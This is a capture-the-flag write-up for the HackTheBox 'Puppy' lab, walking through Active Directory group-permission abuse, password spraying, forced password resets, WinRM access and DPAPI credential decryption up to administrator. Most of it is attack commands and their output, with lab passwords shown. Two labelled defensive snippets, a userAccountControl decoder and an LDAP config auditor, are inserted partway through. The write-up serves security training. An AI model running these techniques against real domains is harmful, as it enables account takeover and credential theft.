HackTheBox Puppy Writeup
A walkthrough of the HackTheBox 'Puppy' machine. This write-up covers initial access, privilege escalation, and post-exploitation techniques.
As is common in real-life pentests, you start the Puppy box with credentials for the following account:
levi.james / KingofAkron2025!
RECONNAISSANCE
Nmap
```
└─$ nmap -sC -sV 10.129.132.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 08:06 EDT
Nmap scan report for 10.129.132.40
Host is up (0.14s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-18 19:06:41Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```
`-sC` runs the default scripts, `-sV` does version enumeration.
Using the given credentials we can list the SMB shares on the host. The key thing to note in the output is that there is one non-default share, `DEV`, and we do not have any access to it.
With the given credentials, let's use bloodhound-python to dump information about the domain, then import the ingestor's output into the BloodHound GUI. We can see that the user `levi.james` is a member of the `HR` group, and `HR` has `GenericWrite` permission on the `Developers` group. Let's use that `GenericWrite` permission to add `levi.james` to the `Developers` group:
```bash
net rpc group addmem "Developers" "levi.james" -U "puppy.htb"/"levi.james"%"KingofAkron2025!" -S 10.129.132.40
```
Let's confirm that we have successfully added the user to the `Developers` group:
```bash
net rpc group members "Developers" -U "puppy.htb"/"levi.james"%"KingofAkron2025!" -S 10.129.132.40
```
The user was successfully added to the `Developers` group. If we now check the share permissions, we have read access to the `DEV` share, which we could not read before. Using smbclient, let's view the contents of the `DEV` share. There is some juicy content in the share; let's download it to our machine.
A `.kdbx` file is an encrypted database used by KeePass, a password manager. Using the keepass4brute tool, I was able to crack the kdbx file's password. Then I imported recovery.kdbx into the KeePass app and used the cracked password to open the database. Inside the database I found some credentials. After this, I dumped the domain's usernames using the netexec tool. Then I saved the usernames into users.txt and the passwords from KeePass into pass.txt, and with netexec I tried every combination of user and password:
```bash
nxc smb 10.129.132.40 -u users.txt -p pass.txt 10.129.132.40 --continue-on-success
```
This gave me a working credential: `ant.edwards:Antman2025!`. In the BloodHound GUI I found that `ant.edwards` is a member of the `Senior devs` group, and on further exploration that `Senior devs` has `GenericAll` permission on the `adam.silver` user.
## GenericAll Abuse
Another thing to notice is that the `adam.silver` account is disabled. To abuse the `GenericAll` permission to force a password change, we first need to enable the account. To do that, I created an `enable.ldif` file with the following content:
```
dn: CN=Adam D. Silver,CN=USERS,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512
```
Then I applied it with ldapmodify:
```bash
ldapmodify -x -D "ant.edwards@puppy.htb" -w 'Antman2025!' -H ldap://10.129.132.40 -f enable.ldif
```
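To see what the LDIF above actually changes, here is an added example (not part of the original writeup) that decodes `userAccountControl` bits, shows why 514 is a disabled account and 512 an enabled one, and diffs an old and new value the way a defender reviewing directory change logs would; the flag values are Microsoft's documented UAC bits, and the `ACCOUNT_*` sample values are constructed.

```python
# Documented userAccountControl bit values (subset).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}
ACCOUNTDISABLE = 0x0002

# Constructed sample values: a disabled normal user, and one that also
# has DONT_EXPIRE_PASSWORD set.
ACCOUNT_DISABLED = 514            # 0x200 | 0x2
ACCOUNT_DISABLED_NOEXPIRE = 0x10202

def decode_uac(value):
    """Return the flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def is_disabled(value):
    return bool(value & ACCOUNTDISABLE)

def enable_preserving_flags(value):
    """Clear only ACCOUNTDISABLE; unlike 'replace ... 512' this keeps every other bit."""
    return value & ~ACCOUNTDISABLE

def diff_uac(old, new):
    """Flags cleared and flags set by a change; a wholesale replace with 512
    on an account that had extra flags shows up as several cleared bits at once."""
    cleared = [n for b, n in sorted(UAC_FLAGS.items()) if old & b and not new & b]
    added = [n for b, n in sorted(UAC_FLAGS.items()) if new & b and not old & b]
    return cleared, added

if __name__ == "__main__":
    print(decode_uac(ACCOUNT_DISABLED))
    print(diff_uac(ACCOUNT_DISABLED_NOEXPIRE, 512))
```

The second diff shows the side effect of the writeup's LDIF on an account with extra flags: DONT_EXPIRE_PASSWORD is silently dropped along with ACCOUNTDISABLE, which is both a change-control problem and a useful detection signal.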
Now that the account is enabled, let's force a password change and verify the new credential:
```bash
net rpc password "Adam.Silver" "newP@ssword2022" -U "puppy.htb"/"ant.edwards"%"Antman2025!" -S 10.129.132.40
nxc smb 10.129.132.40 -u adam.silver -p 'newP@ssword2022'
```
Digging deeper, we can see that `adam.silver` is a member of the `Remote Management Users` group, so I tried to get a WinRM session and succeeded:
```bash
evil-winrm -u adam.silver -p 'newP@ssword2022' -i 10.129.132.40
```
Privilege Escalation
In the WinRM session, I looked for interesting files and found a `Backups` folder in `C:\`. It contains a site backup zip file, and inside the zip is `nms-auth-config.xml.bak`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
  <server>
    <host>DC.PUPPY.HTB</host>
    <port>389</port>
    <base-dn>dc=PUPPY,dc=HTB</base-dn>
    <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
    <bind-password>ChefSteph2025!</bind-password>
  </server>
  <user-attributes>
    <attribute name="username" ldap-attribute="uid" />
    <attribute name="firstName" ldap-attribute="givenName" />
    <attribute name="lastName" ldap-attribute="sn" />
    <attribute name="email" ldap-attribute="mail" />
  </user-attributes>
  <group-attributes>
    <attribute name="groupName" ldap-attribute="cn" />
    <attribute name="groupMember" ldap-attribute="member" />
  </group-attributes>
  <search-filter>
    <filter>(&amp;(objectClass=person)(uid=%s))</filter>
  </search-filter>
</ldap-config>
```
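The backup is valuable to an attacker for three reasons that an audit of the config can catch: a cleartext bind password, plain LDAP on 389 (so the simple bind also crosses the wire unencrypted), and a bind account that is a real person's account rather than a dedicated service principal. Here is an added example (not from the writeup or the box) that checks an `ldap-config` document for those three weaknesses and shows a corrected shape beside the weak one; the password in the weak sample is a placeholder, the hardened sample's service account name and `bind-password-ref` element are hypothetical, and the personal-account check is a naming heuristic.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the same shape as nms-auth-config.xml.bak (password is a placeholder).
WEAK_CONFIG = """<ldap-config>
  <server>
    <host>DC.PUPPY.HTB</host>
    <port>389</port>
    <base-dn>dc=PUPPY,dc=HTB</base-dn>
    <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
    <bind-password>PLACEHOLDER-PASSWORD</bind-password>
  </server>
</ldap-config>"""

# Corrected shape: LDAPS, a dedicated service account (hypothetical name),
# and the secret referenced from a store via a hypothetical element instead of inlined.
HARDENED_CONFIG = """<ldap-config>
  <server>
    <host>DC.PUPPY.HTB</host>
    <port>636</port>
    <base-dn>dc=PUPPY,dc=HTB</base-dn>
    <bind-dn>cn=svc-nms-ldap,ou=service accounts,dc=puppy,dc=htb</bind-dn>
    <bind-password-ref>vault:nms/ldap-bind</bind-password-ref>
  </server>
</ldap-config>"""

# Heuristic: first.last naming usually means a personal account, not a service account.
PERSONAL_DN = re.compile(r"^cn=[a-z]+\.[a-z]+,", re.I)

def audit_ldap_config(xml_text):
    """Return a list of (severity, message) findings for an <ldap-config> document."""
    server = ET.fromstring(xml_text).find("server")
    if server is None:
        return [("error", "no <server> element found")]
    findings = []
    if (server.findtext("bind-password") or "").strip():
        findings.append(("high", "bind-password stored in cleartext; any backup of this file leaks a domain credential"))
    if (server.findtext("port") or "").strip() == "389":
        findings.append(("medium", "plain LDAP on 389; simple bind sends the password unencrypted, use LDAPS (636) or StartTLS"))
    if PERSONAL_DN.match((server.findtext("bind-dn") or "").strip()):
        findings.append(("medium", "bind-dn looks like a personal user account; use a dedicated least-privilege service account"))
    return findings

if __name__ == "__main__":
    for sev, msg in audit_ldap_config(WEAK_CONFIG):
        print(f"[{sev}] {msg}")
```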
From this file we get the credentials for the `steph.cooper` user. With this user I got a WinRM session:
```bash
evil-winrm -u steph.cooper -p 'ChefSteph2025!' -i 10.129.132.40
```
DPAPI Exploitation
Following this wonderful resource on DPAPI exploitation, I downloaded both the credential file and the masterkey file. Then I used Impacket's dpapi tool to decrypt the masterkey:
```
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/puppy]
└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
```
Then I used the decrypted key to recover the stored credential:
```
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/puppy]
└─$ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description :
Unknown     :
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!
```
With this `steph.cooper_adm` user's credential, I got administrator access on the box.